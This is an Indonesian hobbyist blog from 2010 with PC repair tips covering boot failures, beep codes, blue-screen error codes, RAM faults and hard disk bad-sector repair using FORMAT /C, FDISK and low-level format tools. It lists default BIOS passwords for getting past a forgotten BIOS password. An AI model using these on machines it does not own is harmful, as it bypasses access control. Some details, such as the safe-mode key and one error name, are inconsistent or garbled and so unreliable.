Powered By Blogger

badruz luph septha

Cari Blog Ini

Jumat, 09 April 2010

Penyebab Kerusakan Komputer dan Cara Mengatasinya

Mungkin Banyak Kerusakan dan Masalah yang terjadi pada komputer anda,, tapi tidak tahu penyebab kerusakan komputer dan mengatasinya, dan ujung- ujungannya ke tukang Servis deh,, = Bayar Deh = abis deh duit buat malem mingguan.. hhhee,, tapi dalam Artikel ini, anda bisa mendeteksi sebuah masalah dan kerusakan dalam komputer,,Nah silahkan di lihat problem komputernya di list ini , barangkali ada yang masalahnya seperti di bawah ini :
Berikut merupakan rangkuman masalah dan kendala yang sering pengguna komputer hadapi dan bagaimana cara pencegahannya :
1. Komputer Tidak Mau Hidup
Cara Mengatasinya :
- Cek koneksi kabel (dari power outletnya ke tombol power pada PC)
- Cek apakah stabilizer berfungsi atau tdak (jika memakai stabilizer)
- Cek kabel power pada CPU
- Jika masih juga tidak mau hidup permasalahanya mungkin terletak pada power supply atau MB
2. Komputer Mau Hidup Tetapi Tidak Mau Booting
Cara Mengatasinya :
Kenali Terlebih dahulu Bunyi Beep :
Beep 1 kali saja Tanda bahwa kondisi komputer baik
Beep 1 kali, panjang Terdapat problem di memory
Beep 1 kali panjang dan 3 kali pendek Kerusakan di VGA card
Beep 1 kali panjang dan 2 kali pendek Kerusakan di DRAM parity
Beep terus menerus Kerusakan dimodul memory atau memory video
- Cek dengan menggunakan software dianosa seperti sisoft sandra, PC mark04, PC mark05 dll
3. Komputer Mau Booting Tetapi Selalu “Safe Mode “ (untuk masuk ke safe mode tekan F8)
Cara Mengatasinya :
- restart kembali komputer anda
- jika masih trouble intall ulang windows anda
- jika masih safe mode juga, berarti HD anda bermasalah
cek dengan : scan disk
4. Komputer Sering Hang
Cara Mengatasinya
- Disebabkan software mengalami crash
- tekan ctrl + alt + del >> klik End task pada program yang “Not Responding”
- tekan tombol restart pada CPU
- Disebabkan hardware mengalami konflik (adanya penambahan hardware baru)
- konflik antar hardware sering terjadi pada sistem operasi windows
- install ulang windows anda, tetapi yang perlu diingat sebelum reinstall windows anda, lepaskan dulu hardware baru anda
- alankan fasilitas “add new“ hardware yang terdapat pada control panel.
5. Keyboard Tidak Dikenali Oleh Komputer
Cara Mengatasinya
- cek apakah keyboard anda sudah terpasang dengan benar
- jika sudah terpasang dengan benar tapi masih juga keyboard tidak terdeteksi, maka kemungkinan keyboard anda bermasalah.
- coba ganti keyboard anda, jika sudah diganti tapi juga masih bermasalah maka kemungkinan besar yang rusak adalah di bagian port keyboard di MB anda.
- Jika memang Sudah di Ganti Keyboard Baru tapi tetap tidak terdeteksi Juga Coba Ganti dengan Keyboard USB dan apabila tidak terdeteksi Juga berarti ada yang salah Pada sitem Windows
6 Mouse Tidak Dikenali Oleh Komputer
- cek apakah mouse anda sudah terpasang dengan benar
- jika sudah terpasang dengan benar tapi masih juga mouse tidak terdeteksi, maka kemungkinan mouse anda bermasalah.
- coba ganti mouse anda, jika sudah diganti tapi juga masih bermasalah maka kemungkinan besar yang rusak adalah di bagian port mouse di MB anda.
- Jika memang Sudah di Ganti mouse Baru tapi tetap tidak terdeteksi Juga, Coba Ganti dengan mouse USB dan apabila tidak terdeteksi Juga berarti ada yang salah Pada sitem Windows
7. Pointer Mouse Selalu Meloncat-Loncat
Cara Mengatasinya
- mouse kotor segera di Bersihkan (khususnya pada bola mouse)
8. Komputer Sering Crash
Cara Mengatasinya :
- cek semua posisi kabel, hardware, dan juga tegangan pada casing, cek suhu pada CPU dan jua cek ram, processor dan juga vga.
9. Bila Produsen MetherBoard(MB) Tidak Diketahui
Cara Mengatasinya :
- buka casing, dan cek CPU anda biasanya sebuah MB memiliki label produsen yang sekaligus berisi spesifikasi tipe Mbnya.
- Lihat pada manual book
- Cari data Mb lewat internet, cocokan ID yang tercetak pada sticker board denan daftar yang terdapat pada situs www.fcc.gov/oet/fccid, dan cari daftar nomor ID yang dikeluarkan oleh lembaga perijinan untuk perangkat elektonik di Amerika
- Gunakan software analisa, seperti sandra99 dll.
10. Lupa Password BIOS
Cara Mengatasinya :
- Cabut batterey cmos pada cpu
- Atau dengan cara emncoba menebak bberapa password default untuk beberapa produsen bios misalkan AMI dan AWARD (contoh : A.M.I, AMI, AMI_SW, ALLY, 589589 dll)
11. Jam dan setting tanggal BIOS Selalu Berubah-Rubah
Cara Mengatasinya :
- batteray cmos sudah tidak berfungsi (mati), ganti dengan batteray yang baru
12. Menambah Perangkat Hardware Baru, Tp Tidak Terdeteksi Oleh BIOS
Cara Mengatasinya :
- Kemungkinan besar bios anda sudah kuno sehingga tidak dapat mendeteksi hardware yang baru, maka segera update bios anda (bisa download melalui internet, mis : www.windrivers.com)
13. Melacak Kerusakan Card Pada MB
Cara Mengatasinya :
- cobalah denganmencabut dan menancapkan beberapa card pada MB anda
- jika booting berhasil maka card anda tidak bermasalah begitu jua sebaliknya
14. Pasang Processor Baru Tp Tidak Terdeteksi
Cara Mengatasinya :
- cek apakah anda sudah memasang processor denan benar
- cek apakah posisi jumper pada processor sudah benar (tentang jumper pada processor bisa anda priksa pada manual booknya)
15. Crash Setelah Memasang RAM Baru
Cara Mengatasinya :
- kemungkinan ram yang anda pasang tidak kompatibel dengan komputer anda (cabut ram tersebut)
16. Menambah RAM Tapi Tidak Terdeteksi
Cara Mengatasinya :
- Lakukan pengecekan seperti ketika kasus sebelumnya
- Pastikan slot yan dipakai sesuai, misalnya : SD RAM memiliki slot yang hampir sama dengan RD RAM tetapi RD RAM, tidak bisa terdeteksi meskipun bisa dipasang pada slot jenis SD RAM.
17. Setelah Menambah RAM Proses Komputer Manjadi Semakin Lambat
Cara Mengatasinya :
- perhatikan batas kapasitas ram anda, misalnya ram jenis EDO batas maksimalnya adalah 64 MB, maka ketika dipaksakan untuk ditambah maka komputer anda menjadi semakin lambat
18. Virtual Ram
Cara Mengatasinya :
- klik kanan icon My computer, pilih propertis, kemudian pilih tab performance dan klik VIRTUAL MEMORY
- pilih item let me specify my own virtual memory setting (pilih HD yang akan digunakan sebagai virtual memory)
- klok OK
19. Monitor Tidak Mau Nyala
Cara Mengatasinya :
- pastikan semua kabel power maupun konektor yang berhubungan dengan monitor ok
- pastikan juga pin yang ada pada port VGA masuk dengan sempuran tidak ada yang bengkok apalagi tidak masuk semua/salah satu pin ke port VGA
- pastikan juga VGA card anda ok
20. Monitor Menjadi Gelap Saat Loading Windows
Cara Mengatasinya :
- kemungkinan disebabkan karena setup driver untuk monitor tidak tepat(setting frekuensinya terlalu tinggi)
- masuk dulu ke dalam kondisi safe mode (tekan F8)
- install ulang driver VGAnya
21. Tampilan Tiba-Tiba Rusak Dan Komputer Manjadi Hang
Cara Mengatasinya :
- dikarenakan suhu (pada VA card) sangat panas
22. Ukuran Tampilan monitor Tidak Sesuai Keinginan
Cara Mengatasinya :
- masuk ke display propertis (klik kana semabrang tempat pilih propertis)
- Tekan tab setting dan dan atur ukuran tampilan sesuai dengan keinginan (pada screean area)
23. Monitor Seperti Berkedip Saat Digunakan
Cara Mengatasinya :
- masuk ke display propertis (klik kana semabrang tempat pilih propertis)
- Tekan tab setting dan klik advance, kemudian klik adapter, pada bagian ini ditampilkan refresh raet yang dininkan
24. Sound Card Baru Tidak Terdeteksi
Cara Mengatasinya :
- Crash dengan saound card yang lama
- Cek pada manual booknya, apakah soundcard on boardnya perlu dimatikan atau tidak jika hendak menginstall ulang soundcard yan baru (biasanya bisa dimatikan lewat jumper atau bios)
Nah, silahkan di chek permaslahanya?? apakah ada yang sama dengan permasalahan / kerusakan di komputer anda??
"Berfikirlah kembali sebelum ke tukang servis"

Terima kasih. Semoga bermanfaat.
Tips Mengatasi Bluescreen Pada Laptop

Pernahkah anda sewaktu mengerjakan laporan pekerjaan, browsing di internet, ataupun sedang bermain game kesukaan, tiba-tiba Laptop anda restart dengan sendirinya, dan kemudian ketika sedang boot ulang tiba-tiba hanya bluescreen yang anda dapatkan dengan beberapa informasi yang tertera. Akan tetapi tetap saja, laptop anda tidak bisa digunakan.
Bluescreen disebut juga Bluescreen Of Death (BSOD) adalah istilah yang dikenal luas untuk layar yang ditampilkan sistem operasi windows ketika mengalami kesalahan sistem (atau disebut stop error oleh windows). Beberapa hal yang menyebabkan munculnya BSOD ini, diantaranya driver suatu hardware yang tidak bagus, kesalahan penulisan memori RAM, system crash pada registry windows atau penggunaan file Dll yang tidak cocok.
Pada sebuah PC, berbeda dengan laptop atau notebook, anda dapat dengan mudah melakukan analisa terhadap perubahan terbaru terhadap PC anda, terutama pada hardware. Sayangnya, pada user yang menggunakan laptop hal itu sangatlah sulit untuk dilakukan, selain masih dalam garansi toko, tidak semua orang dapat dengan mudah memahami hardware-hardware di dalam laptop. Tetapi jangan patah semangat terlebih dahulu... ada beberapa tips untuk mengatasi Bluescreen tersebut...
Pertama, pastikan terlebih dahulu menu safe mode anda tidak mengalami crash (hal ini jika driver terbaru dari hardware yang ada tidak turut di-load oleh windows). Untuk berada pada safe mode, pada saat booting awal tekan F5 terus menerus, lalu pilih safe mode pada option yang tampil, pada awal tampilan, anda akan ditanya apakah perlu untuk mengaktifkan menu system restore, pilih No untuk mengaktifkan system restore. Lakukan restore pada windows anda, caranya : Start > All Programs > Accessories > System Tools > System Restore. Pilih restore point yang paling dekat. Jika anda tidak ingin menggunakan system restore pada windows,
Selain cara diatas, cara yang paling tepat adalah dengan meng-disable kan driver hardware anda yang terbaru. Caranya: tekan Windows + Pause Break secara bersamaan untuk menampilkan system properties windows anda, pilih tab hardware, pilih device manager untuk menampilkan device manager. Non aktifkan driver hardware yang anda pasang sebelum terjadinya Bluescreen. Atau lakukan rollback driver untuk mengembalikan ke driver sebelumnya.
Pada beberapa kasus BSOD, kita sama sekali tidak dapat menggunakan laptop. Untuk mengatasi hal tersebut dibutuhkan sebuah software seperti Acronis True Image (bisa di download gratis di internet) atau software back-up sejenis. Untuk itu pastikan sebelumnya anda telah memback-up system anda terlebih dahulu. Buatlah bootable media CD pada PC atau laptop teman anda, lalu lakukan booting dengan CD tersebut. Kemudian lakukan restore backup system anda tersebut.
Selain karena kesalahan driver, Bluescreen juga dapat disebabkan oleh virus/trojan yang menyamar menjadi file services pada system, diantaranya smss.exe, winlogon.exe, Isass.exe dan services.exe. Untuk mengatasinya cobalah untuk melacak virus/trojan tersebut dengan program antivirus protable, jalankan program antivirus tersebut, namun kali ini bukan dari sebuah removable storage seperti harddisk atau flashdisk. Lakukan scan virus tersebut melalui unremovable storage seperti CD atau DVD. Ini mengapa anda membutuhkan antivirus portable sehingga anda tidak perlu untuk melakukan proses penginstalan terlebih dahulu ke sistem anda yang mungkin telah terserang oleh virus/trojan terlebih dahulu.

Nah untuk lebih jelasnya tentang BSoD dan cara mengatasi Blue Screen Tersebut berikut klasifikasi dan penyelesaiannya :
1. IRQL_NOT_LESS_OR_EQUAL (0X0000000A)
Error ini yang paling sering muncul pada saat terjadi Blue Screen.
Pesan kesalahan ini biasanya disebabkan kerena ada ketidakcocokan driver yang terinstall di komputer.
Penyebabnya:
- Driver yang bentrok atau tidak cocok
- Permasalahan pada Video Card, hal ini mencakup video card yang di
overclock melebihi batas atau Anda baru berganti Video card dan Anda
belum menguninstall driver Video card lama dari chipset berbeda
- Permasalahan pada Audio Card, meliputi kesalahan konfigurasi atau bug dalam driver sound card
2. NTFS_FILE_SYSTEM atau FAT_FILE_SYSTEM (0X00000024) atau (0X00000023)
Pesan error ini setidaknya sudah sedikit memberikan gambaran di mana
kerusakan berada, yaitu ada di partisi atau filesystemnya tetapi bukan
di harddisknya.
Kita bisa melakukan pengecekan dengan memeriksa kabel SATA atau PATA atau bisa mengecek partisi dengan tool chkdsk.
3. UNEXPECTED_KERNEL_MODE_TRAP (0X0000007F)
Bila Anda mendapatkan pesan error seperti ini, dapat disebabkan karena:
- Overclock Hardware yang berlebihan
- Komponen komputer yang terlalu panas
- BIOS yang korup
- Memory dan CPU yang cacat
4. DATA_BUS_ERROR
Pesan error ini disebabkan karena adanya kemungkinan bahwa memory atau slot memory di motherboard rusak.
5. PAGE_FAULT_IN_NONPAGED_AREA
Pesan error ini disebabkan karena adanya kerusakan hardware, termasuk
memory utama, memory video card, atau memory di processor (L2 Cache)
6. INACCESSIBLE_BOOT_DEVICE
Pesan error ini disebabkan karena adanya kesalahan dalam konfigurasi
jumper harddisk yang salah, virus boot sector, driver IDE controller
yang salah, atau kesalahan driver chipset.
7. VIDEO_DRIVER_INIT_FAILURE
Pesan error ini disebabkan karena adanya Kesalahan terjadi pada
instalasi driver video card yang kurang sempurna, restart pada saat
instalasi atau juga dapat terjadi karena kesalahan dalam instalasi
driver.
8. BAD_POOL_CALLER
Pesan error ini disebabkan karena adanya Kesalahan ini dapat terjadi
karena kesalahan atau driver yang tidak kompatibel. Sering terjadi saat
melakukan instalasi XP dari upgrade, atau bukan dari instalasi baru.
9.PEN_LIST_CORRUPT
Pesan error ini disebabkan karena adanya kerusakan RAM
10.MACHINE_CHECK_EXCEPTION
Pesan error ini disebabkan oleh cacatnya CPU, atau yang di overclock
secara agresif, serta power supply yang kekurangan daya atau rusak.
Nah, Sekarang Gmna ?? SudahKAH Blue Screen anda menjadi Black Screen??
hhhee,,

Terima kasih. Semoga bermanfaat.

Rabu, 07 April 2010

perbaikan RAM dan Harddisk


RAM
Mengatasi masalah pada RAM
# : Ada banyak hal yang menyebabkan, diantaranya adalah :
"Kerusakan" fisik". Untuk mengatasinya Anda harus memeriksa kondisi fisik RAM tersebut. Buka casing komputer Anda, lalu cabut RAM tersebut. Bersihkan apabila RAM dan socketnya kotor. Periksa juga apakah ada karat. Anda juga harus memastikan bahwa RAM tersebut dari bahan yang sama (keemasan atau keperakan). Jika berbeda, sebaiknya Anda mengganti RAM tersebut.
ROM Shadowing Pada beberapa BIOS dan driver 16 bit, kadang-kadang memakai sebagian (baca : sedikit) RAM sebelum Windows dijalankan. Beberapa BIOS juga terdapat feature ROM shadowing yang akan mengcopy isi dari system dan video BIOS ROM ke RAM guna meningkatkan performa komputer (Pada DOS dan Windows 3.1 ). Hal ini karena kecepatan ROM lebih rendah dari RAM. Tetapi jika Anda memakai Windows 95/98/NT dengan memori yang minim sebaiknya feature ROM shadowing dimatikan saja (dari CMOS setup), karena Windows 95/98/NT jarang sekali mengakses ROM sehingga RAM tersebut dapat digunakan oleh Windows.
Penggunaan VGA card on board. Jika misalnya Anda memiliki RAM 32 Mb dan VGA card 2 Mb, maka RAM yang dapat digunakan hanya sebesar 30 Mb (32 Mb - 2 Mb). Jadi sebaiknya jangan memakai VGA card on board.
Terdapat driver atau program yang dijalankan dari config.sys atau autoexec.bat yang bekerja menggunakan RAM. Solusinya : Edit file autoexec.bat dan config.sys dengan menggunakan Notepad. Lalu editlah pada baris yang "mencurigakan" atau yang kira-kira digunakan untuk me-load program. Bila ketemu tambahkan kata REM (tetapi bila Anda menambahkan kata REM maka program tersebut tidak akan di-load/dijalankan). Bila Anda memakai driver CD-ROM 4x dari Teac, ubahlah parameter xmssize= -1 pada autoexec.bat menjadi xmssize=0.
Virtual device driver dijalankan dari system.ini. Untuk mengatasinya buka system ini dengan cara klik Start - Run - ketikkan sysedit. Pilih system.ini. Lalu editlah pada baris yang kira-kira digunakan untuk meload virtual device driver. Alternatif lainnya adalah dengan membuat file system.ini yang baru.
Terdapat baris Maxphyspage pada file system.ini Silakan lihat pada file system.ini, apakah terdapat baris Maxphyspage atau tidak. Jika ya, hapus baris tersebut.
Kesalahan pada CMOS setting. Pada beberapa komputer terdapat feature Memory Hole at 16 Mb atau Hold to 15 Mb RAM. Jika feature tersebut di enable maka jika Anda memiliki RAM yang lebih besar dari 15 Mb atau 16 Mb, Windows tetap akan mendeteksi sebesar 15 Mb atau 16 Mb. Untuk mengatasi hal ini, silakan di disable feature tersebut.
Meload Ramdrive.sys dari config.sys Check your Config.sys file for a line containing "Ramdrive.sys." If you have this line, it means you are using a RAM drive. To disable the RAM drive, remove or disable the line in the Config.sys file that contains "ramdrive.sys." To disable the line, use a text editor (such as Notepad) to edit the Config.sys file and place a semicolon (;) at the beginning of the line. Buka file config.sys dengan Notepad. Cek pada file tersebut, apakah terdapat baris ramdrive.sys. Jika ya, hapus baris tersebut
B luph S : Setelah menambah RAM, mengapa RAM yang terdeteksi masih sama ? A : Setelah Anda menginstall RAM, Anda harus melakukan Setup BIOS ulang. Caranya, pada saat pertama kali menghidupkan komputer sampai muncul logo BIOS, tekan Del (untuk beberapa komputer mungkin Ctrl+Alt+Del atau kombinasi key yang lain). Setelah selesai, pilih Save Setting and Exit. Sebagai tambahan informasi untuk setting tersebut, Anda bisa membaca pada manul booknya.
B luph S : Mengapa terjadi error setelah saya menginstall RAM baru ? A : Anda bisa melihat pada manual booknya. Untuk beberapa BIOS : Jika Anda menginstall (misalnya) 2-4 Mb SIMMS dan 2-8 Mb SIMMS, Anda harus meletakkan RAM yang lebih besar pada Bank 1.
B luph S : Setelah saya menginstall RAM baru, mengapa sering terjadi Blue Screen ? A : Pada komputer yang menggunakan bus 66 MHz (Pentium 133 atau yang lebih tinggi), dibutuhkan RAM dengan kecepatan 60 ns atau yang lebih tinggi. Anda bisa saja menggunakan RAM dengan kecepatan yang lebih kecil dari 60 ns tapi Anda harus mengubah setting Wait State pada BIOS. Ubahlah setting tersebut dari 0 (nol) menjadi 1 (satu).
B luph S : Mengapa muncul tulisan Parity Check Error ? A : Tulisan parity check error dapat muncul jika terdapat kerusakan pada salah satu RAM, salah satu proses DMA tidak berjalan dengan lancar, atau karena terdapat virus parity boot pada hard disk Anda.



Harddisk

Cerita dikit tentang HarddiskSaya membagi harddisk menjadi 4 level, ini bedsarkan riset dan pengalaman saya pribadi selama menangani kerusakan harddisk.
Level 1Kerusakan yg terjadi pada level ini bisanya disebabkan Bad sector. Untuk menanganinya ada beberapa cara dan variasi percobaan, disesuaikan dengan merk harddisk dan banyaknya bad sector.
- Untuk penangan awal bisa gunakan perintah FORMAT C:/C (sesuaikan dengan drive yg akan diformat). /C digunakanuntuk mebersihkan cluster yg rusak.- Langkah kedua jika belum berhasil bisa gunakan program Disk Manager dari masing-masing pabrik pembuat Harddisk.- Jika belum berhasil juga anda bisa gunakan software HDDREG , silahkan download di internet programnya.- Jika belum berhasil coba cara Low Level Format atau Zero File.- Jika masih belum bisa, anda bisa lakukan pemotongan sector harddisk yg rusak, dengan cara membaginya dan tidakmenggunakan sector yang rusak.
Level 2Kerusakan yang terjadi pada level 2 adalah Kehilangan Partisi Harddisk dan Data . Ini bisa disebabkan oleh virus atau kesalahan menggunakan program utility. Ada yg perlu diperhatikan dalam mengembalikan Partisi harddisk yang hilang, yaitu kapasitas harddisk dan Jenis File Systemnya. Partisi dengan File System FAT lebih mudah dikembalikan dibanding NTFS atau File System Linux.- Cek terlebih dahulu partisi harddisk dengan menggunakan FDISK atau Disk Manager- Untuk mengembalikannya bisa gunakan software seperti Acronis Disk Director, Handy Recovery, Stellar Phoniex dll.
Level 3Kerusakan yg menyebabkan harddisk terdeteksi di BIOS tetapi tidak bisa digunakan, selalu muncul pesan error pada saat komputer melakukan POST. Biasanya ini disebabkan FIRMWARE dari harddisk tersebut yg bermasalah. Untuk gejala ini banyak terjadi pada harddisk merk Maxtor dengan seri nama-nama Dewa. Untuk memperbaikinya anda bisa download program Firmware dari website merk harddisk tersebut.
Level 4Kerusakan yang menyebabkan Harddisk benar tidak terdeteksi oleh BIOS dan tidak bisa digunakan lagi. Ini level yang tersulit menurut saya. Karena untuk perbaikannya kita butuh sedikit utak atik perangkat elektronika dan komponen dalamnya. Menganggulangi harddisk yang tidak terdeteksi oleh BIOS banyak cara.- Mengecek arus listrik yg mengalir ke harddisk- Mengganti IC pada mainboard Harddisk- Buka Penutup Cover harddisk dan cek posisi Head harddisk- Cara yg extreme harddisk yg rusak bisa dikanibal dengan harddisk yg lain yg keruskan berbeda, bisa dengan caramengganti maiboardnya atau mengambil IC nya.

Terima kasih. Semoga bermanfaat.
Memperbaiki Harddisk Bad Sector
CARA I

Harddisk adalah media penyimpan yang sangat penting pada komputer. Sayangnya umur pemakaian yang terbatas. Kerusakan pada harddisk dapat disebabkan beberapa hal.
Misalnya :
* Power supply yang tidak memadai dan merusak kontroller harddisk dan motor.
* Harddisk terjatuh dan merusak mekanik didalamnya atau minimal terjadi bad sector.
* Terlalu sering dibawa bawa tanpa pengaman membuat platter harddisk rusak karena goncangan berlebih.
* Suhu didalam harddisk yang panas membuat kondisi harddisk dalam lingkungan tidak stabil.
* Kondisi MTBF/umur harddisk, sudah tercapai dan akan rusak.
Hal yang masih dapat dilakukan untuk memperbaiki harddisk yang terkena bad sector adalah hanya kondisi dimana harddisk masih berputar, keadaan controller harddisk masih bekerja. Tetapi keadaan ini masih dibagi lagi, bila ingin mengunakan harddisk yang terkena bad sector.
Masalah penyebab bad sector adalah salah satu kerusakan yang sering terjadi. Kondisi kerusakan oleh bad sector dibedakan oleh 3 keadaan.
Kondisi dimana platter harddisk aus. Pada kondisi ini harddisk memang sudah tidak dapat digunakan. Semakin lama harddisk semakin rusak dan tidak berguna lagi untuk dipakai sebagai media storage.
Kondisi platter yang aus tetapi belum mencapai kondisi kritis. Kondisi ini dapat dikatakan cukup stabil untuk harddisk. Kemungkinan harddisk masih dapat diperbaiki karena platter masih mungkin dilow level.
Kondisi platter yang aus, baik kondisi yang parah atau ringan tetapi kerusakan terdapat di cluster 0 (lokasi dimana informasi partisi harddisk disimpan). Kondisi ini tidak memungkinkan harddisk diperbaiki.
Membicarakan keadaan harddisk untuk diperbaiki hanya memungkinkan perbaikan pada kondisi ke 2, dimana permukaan harddisk masih stabil tetapi terdapat kerusakan ringan di beberapa tempat.
Tujuan
Upaya untuk mengunakan harddisk yang terdapat bad sector
Men-eliminasi lokasi kerusakan pada bad sector.

Tahapan 1
Sebelum melakukan tahapan selanjutnya sebaiknya mengunakan tahapan 1 untuk memastikan kondisi platter harddisk yang rusak. Untuk mengetahui hal ini harddisk harus dilakukan LOW LEVEL FORMAT (LLF). LLF dapat dilakukan dari BIOS atau Software. Untuk BIOS, beberapa PC lama seperti generasi 486 atau Pentium (586) memiliki option LLF. Atau dapat mengunakan software LLF. Untuk mendapatkan software LLF dapat diambil di Site pembuat harddisk. Atau mencari utiliti file seperti hddutil.exe (dari Maxtor – MaxLLF.exe) dan wipe.exe versi 1.0c 05/02/96.
Fungsi dari software LLF adalah menghapus seluruh informasi baik partisi, data didalam harddisk serta informasi bad sector. Software ini juga berguna untuk memperbaiki kesalahan pembuatan partisi pada FAT 32 dari Windows Fdisk.
Setelah menjalankan program LLF, maka harddisk akan benar-benar bersih seperti kondisi pertama kali digunakan.
Peringatan : Pemakaian LLF software akan menghapus seluruh data didalam harddisk

Tahapan 2
Proses selanjutnya adalah dengan metode try dan error. Tahapan untuk sesi ini adalah :
1. Membuat partisi harddisk : Dengan program FDISK dengan 1 partisi saja, baik primary atau extended partisi. Untuk primary dapat dilakukan dengan single harddisk , tetapi bila menghendaki harddisk sebagai extended, diperlukan sebuah harddisk sebagai proses boot dan telah memiliki primary partisi (partisi untuk melakukan booting).
2. Format harddisk : Dengan FORMAT C: /C. Penambahan perintah /C untuk menjalankan pilihan pemeriksaan bila terjadi bad sector. Selama proses format periksa pada persentasi berapa kerusakan harddisk. Hal ini terlihat pada gambar dibawah ini.
3. Buat partisi kembali : Dengan FDISK, buang seluruh partisi didalam harddisk sebelumnya, dan buat kembali partisi sesuai catatan kerusakan yang terjadi. Asumsi pada gambar bawah adalah pembuatan partisi dengan Primary dan Extended partisi. Pada Primary partisi tidak terlihat dan hanya ditunjukan partisi extended. Pembagian pada gambar dibawah ini adalah pada drive D dan F (22MB dan 12 MB) dibuang karena terdapat bad sector. Sedangkan pada E dan G ( 758MB dan 81MB) adalah sebagai drive yang masih dalam kondisi baik dan dapat digunakan.
4. Untuk memastikan apa bad sector sudah terletak pada partisi harddisk yang akan dibuang, lakukan format pada seluruh letter drive dengan perintah FORMAT /C. Bila bad sector memang terdapat pada partisi yang dibuang (asumsi pada pengujian bad sector terletak pada letter drive D dan F), maka partisi tersebut dapat langsung dibuang. Tetapi bila terjadi kesalahan, misalnya kerusakan bad sector tidak didalam partisi yang akan dibuang melainkan terdapat pada partisi yang akan digunakan, anda harus mengulangi kembali proses dari awal dengan membuang partisi dimana terdapat kesalahan dalam membagi partisi yang terkena bad sector. Hal yang perlu diingat : Pembuatan partisi dilakukan dari awal ke akhir, misalnya C, D, E dan selanjutnya. Untuk membuang partisi mengunakan cara sebaliknya yaitu dari Z ke C. Kesalahan dalam membuang dan membuat partisi yang acak acakan akan mengacaukan sistem partisi harddisk.
5. Proses selanjutnya adalah membuang partisi yang tidak digunakan lagi. Setelah melakukan pemeriksaan dengan program FORMAT, maka pada proses selanjutnya adalah membuang partisi yang mengandung bad sector. Pada gambar dibawah ini adalah: Tahap membuang 2 partisi dengan FDISK untuk letter drive D dan E. Untuk E dan G adalah partisi letter drive yang akan digunakan.
6. Pada akhir tahapan anda dapat memeriksa kembali partisi harddisk dengan option 4 (Display partitisi) pada program FDISK, contoh pada gambar dibawah ini adalah tersisa 3 drive : C sebagai primary partisi (tidak terlihat), 2 extended partisi yang masih baik dan partisi yang mengandung bad sector telah dihapus.
7. Akhir proses. Anda memiliki harddisk dengan kondisi yang telah diperbaiki karena bad sector. Letter drive dibagi atas C sebagai Primary partisi dan digunakan sebagai boot, D (758MB) dan E (81MB) adalah partisi ke 2 dan ke 3 pada extended partisi.
Ketika program FORMAT menampilkan Trying to recover allocation unit xxxxxx, artinya program sedang memeriksa kondisi dimana harddisk tersebut terjadi bad sector. Asumsi pada pengujian dibawah ini adalah dengan Harddisk Seagate 1.2 GB dengan 2 lokasi kerusakan kecil dan perkiraan angka persentasi ditunjukan oleh program FORMAT :Kondisi Display pada program Format persentasi yang dapat digunakan
* Baik 0-20% 20%
* Bad sector 21% Dibuang
* Baik 22-89% 67%
* Bad sector 91% Dibuang
* Baik 91-100% 9%
Bila anda cukup ngotot untuk memperbaiki bad sector anda, dapat juga dilakukan dengan try-error dengan mengulangi pencarian lokasi bad sector pada harddisk secara tahapan yang lebih kecil, misalnya membuat banyak partisi untuk memperkecil kemungkinan terbuangnya space pada partisi yang akan dibuang. Semakin ngotot untuk mencari kerusakan pada tempat dimana terjadi bad sector semakin baik, hanya cara ini akan memerlukan waktu lebih lama walaupun hasilnya memang cukup memuaskan dengan memperkecil lokasi dimana kerusakan harddisk terjadi.
Bila anda belum puas dengan hasil mencari bad sector, maka anda dapat mengulangi prosesur diatas. Untuk melakukan Tips ini sebaiknya sudah mengetahui prosedur dalam membuat partisi dengan program FDISK.
Yang perlu dicatat pada tip ini adalah, berhati-hati pada pemakaian program LLF. Sebaiknya mengunakan single drive untuk mengunakan program ini. Kesalahan melakukan LOW LEVEL FORMAT pada harddisk sangat fatal dan tidak dapat dikembalikin seperti kondisi semula.
Untuk harddisk yang terkena BAD SECTOR sebaiknya mengunakan harddisk yang kondisinya belum terlalu parah atau bad sector terdapat di beberapa tempat dan tidak sporadis tersebar. Kerusakan pada banyak tempat (sporadis bad sector) pada harddisk akan menyulitkan pencarian tempat dimana terjadi bad sector.


CARA II
Pakai Utility

Anda bisa pakai peranti yang mampu menghilangkan logic bad sector dan memperbaikinya. Asal tahu saja, bad sector dibagi jadi dua: logic dan physic. Peranti itu membuat hard disk kembali bekerja dengan “menghapus” bad sector-nya.
Hard disk biasanya dipaketkan dengan suatu peranti lunak untuk fungsi manajemen sekaligus perbaikan. Misalnya, Maxtor dan Quantum punya MaxBlast, Samsung punya ClearHDD, Seagate punya Seagate Format, Western Digital punya Old DLG Diagnostic, dan Fujitsu punya FJ-IDE Drive Initializer Utility.
Anda tidak wajib pakai peranti lunak paketan. Anda bisa juga pakai peranti lain. Perbaikan hard disk yang dijelaskan pada artikel ini memakai SpinRite (www.grc.com). Peranti lunak ini buatan Gibson Research ini cukup baik buat mengatasi masalah bad sector pada hard disk. Versi terbaru peranti ini—versi 6,0—seharga US$ 89.
SpinRite mendukung FAT, NTFS, Linux, Novell, drive dengan beberapa sistem operasi serta hard disk yang belum diformat. Cara menggunakannya mudah saja. Tinggal ikuti langkah-langkah ini.
1. Buat disket atau CD yang bisa boot. Buatnya di SpinRite. Klik [Create Boot Diskette], [Create ISO or Image File], atau [Install SpinRite on Drive]. Biar gampang, pilih bikin CD bootable. Asal tahu, SpinRite hanya berjalan dalam modus DOS.
2. Setelah file image sudah jadi, gunakan software pembakar CD, seperti Nero Burning ROM, untuk membuat CD. Restart komputer dan boot dengan CD yang barusan dibuat.
3. SpinRite punya 5 opsi atau level. Level yang kemungkinan besar Anda butuhkan adalah level 2 ataupun level 4. Tindakan di level 2 adalah pengembalian data, sedangkan level 4 adalah pemeliharaan drive dan analisis. Pilih saja tindakan yang ingin Anda lakukan.
4. Level apa pun yang Anda pilih, Anda akan diminta untuk memilih drive atau partisi yang ingin Anda periksa atau perbaiki. Setelah itu, lihat atau ubah opsi bagaimana SpinRite memeriksa hard disk Anda. Kalau sudah, lanjutkan dengan langkah selanjutnya yakni menguji kinerja drive.
Proses pemeriksaan bisa berjalan beberapa jam, tergantung kapasitas dan kecepatan hard disk. Menurut informasi dari pembuatnya, kecepatan maksimal SpinRite adalah 120GB per jam.
Tetapi, banyak hal yang memengaruhi kecepatan pemeriksaan itu, misalnya kerusakan hard disk, dukungan Ultra DMA, atau konfigurasi sistem. Untungnya, Anda bisa menghentikan proses pemeriksaan untuk dilanjutkan di lain waktu. Agar tidak perlu mengulang, catat saja posisi pemerikaan ketika Anda menghentikan proses.
